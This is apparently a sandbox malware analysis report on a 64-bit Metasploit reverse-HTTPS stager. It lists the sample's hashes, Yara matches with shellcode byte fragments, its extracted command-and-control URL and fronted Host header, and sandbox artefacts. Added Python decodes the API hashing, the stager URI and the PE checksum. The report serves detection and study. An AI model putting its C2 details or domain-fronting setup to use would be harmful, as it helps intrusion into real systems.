
Windows Analysis Report
443_2003_https-df.exe

Overview

General Information

Sample name: 443_2003_https-df.exe
Analysis ID: 1636969
MD5: 8d9c0f42baf129d1b430a01463dd7870
SHA1: 4054be8879b458c034340b19311baa42218c216d
SHA256: b3ffbb213580aac6f9dc8d7ea321bd61be3e5cd41647e29aabeaedee2bfc4b83
Tags: exe, malware, Rozena, user-Joker

Detection

Metasploit
Score: 96
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
C2 URLs / IPs found in malware configuration
Joe Sandbox ML detected suspicious sample
AV process strings found (often used to terminate AV products)
Entry point lies outside standard sections
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Classification chart (legend: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious). The engine's label for this sample is mal96.troj.winEXE@2/6@1/1.
  • System is w10x64
  • 443_2003_https-df.exe (PID: 2820 cmdline: "C:\Users\user\Desktop\443_2003_https-df.exe" MD5: 8D9C0F42BAF129D1B430A01463DD7870)
    • WerFault.exe (PID: 1412 cmdline: C:\Windows\system32\WerFault.exe -u -p 2820 -s 1812 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
{
  "Type": "Metasploit Connect",
  "URL": "http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S"
}
Yara matches on the submitted file (Source | Rule | Description | Author; matched strings indented):
443_2003_https-df.exe | JoeSecurity_MetasploitPayload_2 | Yara detected Metasploit Payload | Joe Security
443_2003_https-df.exe | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
443_2003_https-df.exe | Windows_Trojan_Metasploit_0f5a852d | Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. | unknown
  • 0x18db:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
443_2003_https-df.exe | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
  • 0x1881:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1

Yara matches in process memory dumps (Source | Rule | Description | Author; matched strings indented):
00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp | Windows_Trojan_Metasploit_0f5a852d | Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. | unknown
  • 0xdb:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
  • 0x81:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp | Windows_Trojan_Metasploit_0f5a852d | Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. | unknown
  • 0xdb:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
(1 further entry collapsed in the original report)

Yara matches on unpacked PE images (Source | Rule | Description | Author; matched strings indented):
0.0.443_2003_https-df.exe.140000000.0.unpack | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
0.0.443_2003_https-df.exe.140000000.0.unpack | Windows_Trojan_Metasploit_0f5a852d | Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. | unknown
  • 0x1723:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
0.0.443_2003_https-df.exe.140000000.0.unpack | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
  • 0x16c9:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
0.2.443_2003_https-df.exe.140000000.0.unpack | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
0.2.443_2003_https-df.exe.140000000.0.unpack | Windows_Trojan_Metasploit_0f5a852d | Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. | unknown
  • 0x1723:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
(1 further entry collapsed in the original report)
              No Sigma rule has matched
              No Suricata rule has matched
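The two Elastic rule strings above are the x64 Metasploit API-hash idiom. The c9773203 string is the ROR-13 hash loop (xor rax,rax; lodsb; ror r9d,13; add r9d,eax; cmp al,ah; jne; add r9,[rsp+8]; cmp r9d,r10d). The 0f5a852d string is the call that loads WinINet: mov r14,'wininet\0'; push r14; mov rcx,rsp; mov r10,imm32; call rbp. The following Python is an added example, not code from the Joe Sandbox report, Elastic or Metasploit: it re-implements the hash the way the shellcode computes it and decodes the 0f5a852d bytes, showing that the immediate 0x0726774C is hash("kernel32.dll", "LoadLibraryA"), i.e. the stager calls LoadLibraryA("wininet") before resolving the WinINet exports. The candidate export list is my choice of names to try, not something the report states.

```python
"""Re-implementation of the Metasploit x64 block_api ROR-13 hash and a decoder
for the LoadLibraryA("wininet") stub that Windows_Trojan_Metasploit_0f5a852d matches.
Added example for this report; not Joe Sandbox, Elastic or Metasploit code."""
import struct
from typing import Optional

MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """32-bit rotate right, the `ror r9d, 13` in the hash loop."""
    value &= MASK32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def msf_hash(module: str, function: str, bits: int = 13) -> int:
    """hash(module, function) as block_api.asm computes it at run time.

    The module part walks BaseDllName from the PEB loader list: UTF-16LE,
    upper-cased, including the 2-byte terminator (MaximumLength bytes).
    The function part walks the ASCII export name including its null.
    Per byte: h = ror(h, 13) + byte; the two sums are added modulo 2**32.
    """
    h_mod = 0
    for b in (module.upper() + "\x00").encode("utf-16-le"):
        h_mod = (ror32(h_mod, bits) + b) & MASK32
    h_fn = 0
    for b in (function + "\x00").encode("ascii"):
        h_fn = (ror32(h_fn, bits) + b) & MASK32
    return (h_mod + h_fn) & MASK32


# $a of Windows_Trojan_Metasploit_0f5a852d, copied from the rule hit in this report.
WININET_STUB = bytes.fromhex(
    "49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5"
)


def decode_loadlibrary_stub(code: bytes) -> dict:
    """Decode the fixed-shape stub:

        49 BE imm64      mov r14, imm64   ; DLL name packed into a register
        41 56            push r14         ; the name string now lives on the stack
        48 89 E1         mov rcx, rsp     ; rcx = pointer to the name
        49 C7 C2 imm32   mov r10, imm32   ; API hash selecting the export
        FF D5            call rbp         ; rbp -> block_api resolver
    """
    expected = (b"\x49\xBE", b"\x41\x56", b"\x48\x89\xE1", b"\x49\xC7\xC2", b"\xFF\xD5")
    actual = (code[0:2], code[10:12], code[12:15], code[15:18], code[22:24])
    if actual != expected:
        raise ValueError("not the mov r14 / push / mov rcx,rsp / mov r10 / call rbp stub")
    dll_name = code[2:10].rstrip(b"\x00").decode("ascii")
    api_hash = struct.unpack("<I", code[18:22])[0]
    return {"dll_name": dll_name, "api_hash": api_hash}


# Exports worth trying for a WinINet reverse_https stager (my candidate list,
# not something the report states).
CANDIDATES = [
    ("kernel32.dll", "LoadLibraryA"),
    ("kernel32.dll", "VirtualAlloc"),
    ("kernel32.dll", "ExitProcess"),
    ("wininet.dll", "InternetOpenA"),
    ("wininet.dll", "InternetConnectA"),
    ("wininet.dll", "HttpOpenRequestA"),
    ("wininet.dll", "InternetSetOptionA"),
    ("wininet.dll", "HttpSendRequestA"),
    ("wininet.dll", "InternetReadFile"),
]


def identify_hash(api_hash: int, candidates=CANDIDATES) -> Optional[str]:
    """Brute-force an API hash against known module!export pairs."""
    for module, function in candidates:
        if msf_hash(module, function) == api_hash:
            return f"{module}!{function}"
    return None


if __name__ == "__main__":
    stub = decode_loadlibrary_stub(WININET_STUB)
    print(f"LoadLibraryA argument: {stub['dll_name']!r}")
    print(f"hash 0x{stub['api_hash']:08X} -> {identify_hash(stub['api_hash'])}")
    for module, function in CANDIDATES:
        print(f"0x{msf_hash(module, function):08X} = {module}!{function}")
```

Because the module part of the hash is taken from the loader list, the same table works for any shellcode built from block_api, which is why the Elastic rule description warns that other families reuse it; the hash values, not the rule, tell you which APIs a given stub resolves.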


              AV Detection

Source: 443_2003_https-df.exe | Avira: detected
Source: 443_2003_https-df.exe | Malware Configuration Extractor: Metasploit {"Type": "Metasploit Connect", "URL": "http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S"}
Source: 443_2003_https-df.exe | Virustotal: Detection: 78%
Source: 443_2003_https-df.exe | ReversingLabs: Detection: 84%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown | HTTPS traffic detected: 74.82.86.0:443 -> 192.168.2.9:49683 version: TLS 1.2

              Networking

Source: Malware configuration extractor | URLs: http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S HTTP/1.1 | Host: cdn123.offseccdn.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 | Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Code function: 0_2_00000001400042B6 VirtualAlloc, InternetReadFile
Source: global traffic | DNS traffic detected: DNS query: good.com
Source: Amcache.hve.3.dr | String found in binary or memory: http://upx.sf.net
Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://good.com/
Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://good.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7
Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000002.1160429536.00000000005DD000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000002.1160712596.0000000002A50000.00000040.00001000.00020000.00000000.sdmp; 00000000.00000003.1076984923.00000000005DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.blackberry.com
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown | Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown | HTTPS traffic detected: 74.82.86.0:443 -> 192.168.2.9:49683 version: TLS 1.2

Read together: the stager resolves good.com and opens a TLS 1.2 session to 74.82.86.0:443, but the HTTP Host header it sends inside that session names cdn123.offseccdn.com. A Host header that differs from the resolved name is a deliberate stager setting (domain-fronting style), so the Host value and the DNS name are two separate indicators. The extractor prints the URL with an http:// scheme although the observed transport is TLS on port 443; the https://good.com/ string in process memory confirms the real scheme. The VirtualAlloc followed by InternetReadFile in function 0_2_00000001400042B6 is the staged-download shape: allocate a buffer, read the response body into it.
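The request path is not random filler. In Metasploit reverse_http(s) stagers the 8-bit checksum of the URI (sum of its base64url characters modulo 256) tells the handler what kind of client is connecting, and the first 22 characters are the base64url-encoded payload UUID (platform, architecture and build timestamp). The Python below is an added example, not Joe Sandbox or Metasploit code: it mirrors the framework's UriChecksum and UUID parsing logic (constants transcribed from the framework source), runs it on the request and DNS query recorded above, and flags the Host header mismatch. The handler-mode table and platform/architecture ids are my transcription; the 92 value is confirmed by the page's own URI.

```python
"""Decode the Metasploit reverse_http(s) stager URI from this report: the 8-bit
URI checksum that selects the handler mode and the payload UUID in the first 22
characters. Added example; mirrors the framework's UriChecksum / UUID logic but
is not Metasploit or Joe Sandbox code."""
import base64
import re
import struct
from datetime import datetime, timezone

# Rex::Payloads::Meterpreter::UriChecksum constants (transcribed from the framework).
URI_CHECKSUM_MODES = {
    92: "init_native",   # URI_CHECKSUM_INITW / INITN: Windows and other native stagers
    80: "init_python",   # URI_CHECKSUM_INITP
    88: "init_java",     # URI_CHECKSUM_INITJ
    95: "init_connect",  # URI_CHECKSUM_INIT_CONN: new stageless session
    98: "connect",       # URI_CHECKSUM_CONN: existing session
}
URI_CHECKSUM_UUID_MIN_LEN = 22  # 16 raw bytes -> 22 base64url chars, padding stripped

# Msf::Payload::UUID id tables, only the entries needed here.
PLATFORMS = {1: "windows", 4: "java", 6: "linux", 9: "osx", 21: "python"}
ARCHITECTURES = {1: "x86", 2: "x64"}


def checksum8(text: str) -> int:
    """Rex::Text.checksum8: sum of the byte values modulo 256."""
    return sum(text.encode("ascii")) % 256


def parse_uuid(raw: bytes) -> dict:
    """Msf::Payload::UUID#parse_raw.

    Layout: puid(8) | xor1 | xor2 | platform ^ xor1 | arch ^ xor2 |
            timestamp(4, big-endian) ^ (xor1, xor2, xor1, xor2)
    """
    puid, xor1, xor2, plat_enc, arch_enc, ts_enc = struct.unpack(">8sBBBBI", raw[:16])
    time_xor = struct.unpack(">I", bytes([xor1, xor2, xor1, xor2]))[0]
    plat_id, arch_id = plat_enc ^ xor1, arch_enc ^ xor2
    ts = ts_enc ^ time_xor
    return {
        "puid": puid.hex(),
        "platform": PLATFORMS.get(plat_id, f"unknown({plat_id})"),
        "arch": ARCHITECTURES.get(arch_id, f"unknown({arch_id})"),
        "timestamp": ts,
        "generated_utc": datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
    }


def process_uri_resource(path: str) -> dict:
    """UriChecksum#process_uri_resource: drop non-base64url chars, checksum, decode UUID."""
    uri_bare = re.sub(r"[^a-zA-Z0-9_\-]", "", path)
    csum = checksum8(uri_bare)
    result = {"checksum8": csum, "mode": URI_CHECKSUM_MODES.get(csum, "unknown"), "uuid": None}
    if len(uri_bare) >= URI_CHECKSUM_UUID_MIN_LEN:
        b64 = uri_bare[:URI_CHECKSUM_UUID_MIN_LEN]
        result["uuid"] = parse_uuid(base64.urlsafe_b64decode(b64 + "=" * (-len(b64) % 4)))
    return result


# Request and DNS query as recorded in the Networking section of this report.
REQUEST = (
    "GET /8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S HTTP/1.1\r\n"
    "Host: cdn123.offseccdn.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
DNS_QUERY = "good.com"


def triage_request(request: str, resolved_name: str) -> dict:
    """Classify the URI and flag a Host header that differs from the name the client resolved."""
    lines = request.split("\r\n")
    path = lines[0].split(" ")[1]
    host = None
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "host":
            host = value.strip()
    info = process_uri_resource(path)
    info["host_header"] = host
    info["host_mismatch"] = host is not None and host.lower() != resolved_name.lower()
    return info


if __name__ == "__main__":
    for key, value in triage_request(REQUEST, DNS_QUERY).items():
        print(f"{key}: {value}")
```

For this sample the checksum is 92 (a native stager), the UUID decodes to platform windows / arch x64, matching the 64-bit image and Yara hits, and the Host header does not match the resolved name. The same routine applied to proxy logs lets you triage any suspicious long base64url path without needing the binary: a checksum of 92, 95 or 98 on a path of 22 or more such characters is a strong Metasploit indicator even when the C2 is fronted through a legitimate-looking CDN host.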

              System Summary

Matched rule "Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families." (Author: unknown) in:
  443_2003_https-df.exe (type: SAMPLE)
  0.0.443_2003_https-df.exe.140000000.0.unpack (type: UNPACKEDPE)
  0.2.443_2003_https-df.exe.140000000.0.unpack (type: UNPACKEDPE)
  00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp (type: MEMORY)
  00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp (type: MEMORY)
Matched rule "Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families." (Author: unknown) in the same five sources.
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2820 -s 1812
Matched rule Windows_Trojan_Metasploit_0f5a852d in the same five sources. Rule metadata: os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
Matched rule Windows_Trojan_Metasploit_c9773203 in the same five sources. Rule metadata: os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: classification engine | Classification label: mal96.troj.winEXE@2/6@1/1
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2820
Source: C:\Windows\System32\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\2c0a8481-0add-47fa-a8eb-a8d5161218d0
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 443_2003_https-df.exe | Virustotal: Detection: 78%
Source: 443_2003_https-df.exe | ReversingLabs: Detection: 84%
Source: unknown | Process created: C:\Users\user\Desktop\443_2003_https-df.exe "C:\Users\user\Desktop\443_2003_https-df.exe"
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2820 -s 1812
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Sections loaded, in order: apphelp.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll
Source: C:\Users\user\Desktop\443_2003_https-df.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: 443_2003_https-df.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: initial sample | Static PE information: section where entry point is pointing to: .jcho
Source: 443_2003_https-df.exe | Static PE information: real checksum: 0xfa97 should be: 0xfc4f
Source: 443_2003_https-df.exe | Static PE information: section name: .jcho
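The static PE finding above reports a stored CheckSum of 0xfa97 against a computed 0xfc4f. The check itself is short arithmetic, and knowing it helps judge the finding: a non-zero but wrong CheckSum is the usual side effect of bytes being changed after linking (a packer, or a post-build patch of a section such as the non-standard .jcho here), while a value of 0 simply means the linker never filled the field in. The Python below is an added example, not Joe Sandbox code; since the sample is not on this page it verifies the routine against a constructed PE32+ header stub (not a loadable image), whose expected value was worked out by hand.

```python
"""PE CheckSum recomputation, the arithmetic behind the report's
'real checksum: 0xfa97 should be: 0xfc4f' finding. Added example, not Joe
Sandbox code; the 512-byte PE32+ header below is constructed and not loadable."""
import struct


def checksum_offset(image: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum.

    e_lfanew (at 0x3C) -> 'PE\\0\\0' (4) -> IMAGE_FILE_HEADER (20) -> CheckSum sits
    64 bytes into the optional header for both PE32 and PE32+.
    """
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    return e_lfanew + 4 + 20 + 64


def pe_checksum(image: bytes) -> int:
    """Same arithmetic as imagehlp CheckSumMappedFile.

    Sum every little-endian 32-bit word except the stored CheckSum field with
    end-around carry, fold to 16 bits, then add the file length. Assumes the
    CheckSum field is 4-byte aligned, which holds for any 8-aligned e_lfanew.
    """
    skip = checksum_offset(image)
    padded = image + b"\x00" * (-len(image) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return (total + len(image)) & 0xFFFFFFFF


def read_checksum(image: bytes) -> int:
    return struct.unpack_from("<I", image, checksum_offset(image))[0]


def set_checksum(image: bytes) -> bytes:
    """Return a copy with the CheckSum field filled in (what a linker does)."""
    off = checksum_offset(image)
    return image[:off] + struct.pack("<I", pe_checksum(image)) + image[off + 4:]


def verify_checksum(image: bytes) -> tuple:
    """(stored, expected, ok). A stored 0 means 'not set'. The loader enforces the
    field only for drivers and boot-time DLLs, so a user-mode EXE runs with a wrong
    value; the mismatch is a tamper hint, not a load failure."""
    stored, expected = read_checksum(image), pe_checksum(image)
    return stored, expected, stored == expected


def build_minimal_pe32plus() -> bytes:
    """Constructed header-only PE32+ stub: MZ with e_lfanew=0x40, COFF header for
    AMD64 with one section, 240-byte optional header, zero padding to 512 bytes."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 0xF0, 0x0022)
    opt = bytearray(0xF0)
    struct.pack_into("<H", opt, 0, 0x20B)           # PE32+ magic
    struct.pack_into("<Q", opt, 24, 0x140000000)    # ImageBase, same as the sample
    image = bytes(dos) + b"PE\x00\x00" + coff + bytes(opt)
    return image + b"\x00" * (512 - len(image))


if __name__ == "__main__":
    stub = build_minimal_pe32plus()
    fixed = set_checksum(stub)
    print("stored 0x%x, expected 0x%x, ok=%s" % verify_checksum(fixed))
```

Run verify_checksum over a real file's bytes to reproduce the sandbox finding; the stored field is excluded from the sum, so rewriting it never changes the expected value, which is what makes the comparison meaningful.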
Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 occurrences)
Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX (50 occurrences)
Provenance note for the strings below: Amcache.hve is the Windows application-compatibility hive, and the .3.dr suffix marks it as a file dropped by a process other than the sample (process 0). The VMware and Hyper-V hardware strings and the msmpeng.exe (Windows Defender) paths found in it therefore describe the analysis VM, not the sample's code, and the "AV process strings found" signature should be weighed accordingly. The "Hyper-V RAW" string in the sample's own memory is the name of the Winsock provider from mswsock.dll, as the surrounding bytes on the first such line show.
Source: Amcache.hve.3.dr | Binary or memory string: VMware
Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual USB Mouse
Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.000000000055A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@(Z%SystemRoot%\system32\mswsock.dllkk
Source: Amcache.hve.3.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr | Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
Source: Amcache.hve.3.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr, Amcache.hve.LOG1.3.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr, Amcache.hve.LOG1.3.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.3.dr, Amcache.hve.LOG1.3.dr | Binary or memory string: MsMpEng.exe

              Remote Access Functionality

Source: Yara match | File source: 443_2003_https-df.exe, type: SAMPLE
